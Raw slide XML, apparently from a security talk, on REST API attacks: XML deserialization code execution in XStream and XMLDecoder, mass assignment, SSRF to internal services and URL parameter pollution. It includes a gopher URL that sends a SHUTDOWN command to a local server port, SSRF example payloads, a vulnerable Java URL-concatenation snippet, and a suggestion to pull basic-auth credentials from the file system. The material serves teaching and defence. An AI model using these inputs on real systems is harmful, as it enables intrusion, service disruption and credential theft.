          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>joernchen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>another example at https://gist.github.com/joernchen/3623896</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149998114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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML Serialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="762000"/>
            <a:ext cx="8686800" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every REST API allows the raw input of XML to be converted to native objects.  This deserialization process can be used to execute arbitrary code on the REST server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>REST APIs which use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> where found to have these vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When xml is directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deserialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to ORM objects and persisted, an attacker could supply fields which are externally hidden but present in the database (i.e. role(s))  This usually occurs in the user or profile updating logic of a REST API.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76793321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dirty="0" smtClean="0"/>
              <a:t>XML Serialization Remote Code Execution – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Demo)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5410200"/>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Alvaro Munoz figured this out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199473514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dirty="0" smtClean="0"/>
              <a:t>XML Serialization Remote Code Execution – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Demo)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97744697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US" dirty="0" smtClean="0"/>
              <a:t>Causes of REST Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838200"/>
            <a:ext cx="8686800" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Location in the trusted network of your data center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>History of REST Implementations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Self describing nature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input types and interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URLs to backend REST APIs are built with concatenation instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>URIBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Prepared URI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Side Request Forgery) to Internal REST APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inbred Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extensions in REST frameworks that enhance development of REST functionality at the expense of security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reliance on incorrectly implemented protocols (SAML, XML Signature, XML Encryption, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incorrect assumptions of application behavior</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251980415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dirty="0" smtClean="0"/>
              <a:t>XML Serialization Mass Assignment (Demo)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218674401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752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs to backend REST APIs are built with concatenation instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>URIBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Prepared URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2209800"/>
            <a:ext cx="8686800" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most publically exposed REST APIs turn around and invoke internal REST APIs using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>URLConnections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or other REST clients.  If user input is directly concatenated into the URL used to make the backend REST request then the application could be vulnerable to Extended HPPP. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150515318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219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSRF (Server Side Request Forgery) to Internal REST APIs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers can take advantage of any server-side request forwarding or server-side request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>proxying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> mechanisms to attack internal-only REST APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples: RFI through PHP include(), REST framework specific proxy (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RESTlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Redirector), XXE, WS-* protocols, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most internal REST APIs are using basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> over SSL.  So you can use the same attacks above to find the basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>credentials on the file system and embed them in the URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://user:password@internalSvr.com/xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28033134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8736628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smtClean="0"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838200"/>
            <a:ext cx="8686800" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anything which looks like a URI/URL in XML is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>candidate for internal network port scanning or data exfiltration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WS-Addressing example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xmlns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.w3.org/2005/08/addressing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://MongoServer:27080&lt;/To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also nest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use gopher to pass arbitrary packets to internal servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>opher://localhost:8005/SHUTDOWN%0d%0a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*See:  SSRF vs. Business-critical Applications Part 2: New Vectors and Connect-Back Attacks by Alexander </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Polyakov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377336428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715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Extended HPPP (HTTP Path &amp; Parameter Pollution)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="762000"/>
            <a:ext cx="8686800" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Luca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Carettoni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in 2009.  It utilized the discrepancy in how duplicate request parameters were processed to override application specific default values in URLs.  Typically attacks utilized the “&amp;” character to fool backend services in accepting attacker controlled request parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extended HPPP utilizes matrix and path parameters, JSON injection and path segment characters to change the underlying semantics of a REST URL request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“#” can be used to remove ending URL characters similar to “--” in SQL Injection and “//” in JavaScript Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“../” can be used to change the overall semantics of the REST request in path based APIs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> query parameter based)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“;” can be used to add matrix parameters to the URL at different path segments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The “_method” query parameter can be used to change a GET request to a PUT, DELETE, and sometimes a POST (if there is a bug in the REST API)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pecial framework specific query parameters allow enhanced access to backend data through REST API.  The “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>qt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” parameter in Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSON Injection is also used to provide the necessary input to the application receiver.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64163813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715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extended HPPP (Apply Your Knowledge I)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="990600"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“entity”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“id”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urlGET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= new URL(“http://svr.com:5984/customers/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entity + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“?id=“</a:t>
            </a:r>
            <a:r>
